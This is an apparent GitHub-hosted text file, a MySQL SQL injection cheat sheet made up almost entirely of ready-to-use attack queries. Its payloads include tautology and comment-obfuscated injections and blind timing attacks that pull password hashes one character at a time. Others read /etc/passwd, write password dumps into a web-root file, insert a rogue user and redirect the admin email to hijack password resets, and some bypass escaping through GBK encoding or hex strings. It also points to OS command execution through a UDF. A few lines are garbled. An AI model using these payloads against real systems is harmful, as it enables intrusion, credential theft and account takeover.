-
Notifications
You must be signed in to change notification settings - Fork 158
/
MySQL_SLQInjection_cheatsheet.txt
234 lines (179 loc) · 8.19 KB
/
MySQL_SLQInjection_cheatsheet.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
Version SELECT @@version
Comments SELECT 1; #comment
SELECT /*comment*/1;
Current User SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; — priv
List Password Hashes SELECT host, user, password FROM mysql.user; — priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privs
SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns
List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database SELECT database()
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db — priv
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; — find table which have a column called 'username'
Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr('abcd', 3, 1); # returns c
Bitwise AND SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char
SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii('A'); # returns 65
Casting SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
String Concatenation SELECT CONCAT('A','B'); #returns AB
SELECT CONCAT('A','B','C'); # returns ABC
If Statement
SELECT if(1=1,'foo','bar'); — returns 'foo'
Case Statement SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes SELECT 0×414243; # returns ABC
Time Delay SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution
If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform.
Local File Access …' UNION ALL SELECT LOAD_FILE('/etc/passwd') — priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; — priv, write to file system
Hostname, IP Address Impossible?
Create Users CREATE USER test1 IDENTIFIED BY 'pass1'; — priv
Delete Users DROP USER test1; — priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@'%'; — priv
Location of DB files SELECT @@datadir;
Default/System Databases information_schema (>= mysql 5.0)
mysql
MySQL Injection Cheat Sheet
Basics.
SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
Variations.
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"
SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES
SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION()
SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db;
Blind injection vectors.
Operators
SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;
Evaluate
all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);
Math
SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);
Misc
SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');
Benchmark
SELECT BENCHMARK(10000000,ENCODE('abc','123'));
this takes around 5 sec on a localhost
SELECT BENCHMARK(1000000,MD5(CHAR(116)))
this takes around 7 sec on a localhost
SELECT BENCHMARK(10000000,MD5(CHAR(116)))
this takes around 70 sec on a localhost
Using the timeout to check if user exists
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login
Beware of of the N rounds, add an extra zero and it could stall or crash your
browser!
Gathering info
Table mapping
SELECT COUNT(*) FROM tablename
Field mapping
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;
User mapping
SELECT * FROM tablename WHERE email = '[email protected]';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'
Advanced SQL vectors
Writing info into files
SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE
'/path/location/on/server/www/passes.txt'
Writing info into files without single quotes: (example)
SELECT password FROM tablename WHERE username =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39)) INTO
OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR(
39))
Note: You must specify a new file, it may not exist! and give the correct
pathname!
The CHAR() quoteless function
SELECT * FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
SELECT * FROM login WHERE user = CHAR(39,97,39)
Extracting hashes
SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
example:
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,1) = CHAR(97),
BENCHMARK(1000000,MD5('x')),null) FROM login
SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(passwordfield,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5('x')),null) FROM login
explaining: (passwordfield,startcharacter,selectlength)
is like: (password,1,2) this selects: ‘ab’
is like: (password,1,3) this selects: ‘abc’
is like: (password,1,4) this selects: ‘abcd’
A quoteless example:
SELECT user FROM login WHERE user =
CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97),
BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login
Possible chars: 0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122
Misc
Insert a new user into DB
INSERT INTO login SET user = 'r00t', pass = 'abc'
Retrieve /etc/passwd file, put it into a field and insert a new user
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user =
'r00t', pass = 'abc'
Then login!
Write the DB user away into tmp
SELECT host,user,password FROM user into outfile '/tmp/passwd';
Change admin e-mail, for “forgot login retrieval.”
UPDATE users set email = '[email protected]' WHERE email = '[email protected]';
Bypassing PHP functions
(MySQL 4.1.x before 4.1.20 and 5.0.x)
Bypassing addslashes() with GBK encoding
WHERE x = 0xbf27admin 0xbf27
Bypassing mysql_real_escape_string() with BIG5 or GBK
"injection string"
に関する追加情報:
the above chars are Chinese Big5
Advanced Vectors
Using an HEX encoded query to bypass escaping.
Normal:
SELECT * FROM login WHERE user = 'root'
Bypass:
SELECT * FROM login WHERE user = 0x726F6F74
Inserting a new user in SQL.
Normal:
insert into login set user = ‘root’, pass = ‘root’
Bypass:
insert into login set user = 0x726F6F74, pass = 0x726F6F74
How to determin the HEX value for injection.
SELECT HEX('root');
gives you:
726F6F74
then add:
0x
before it.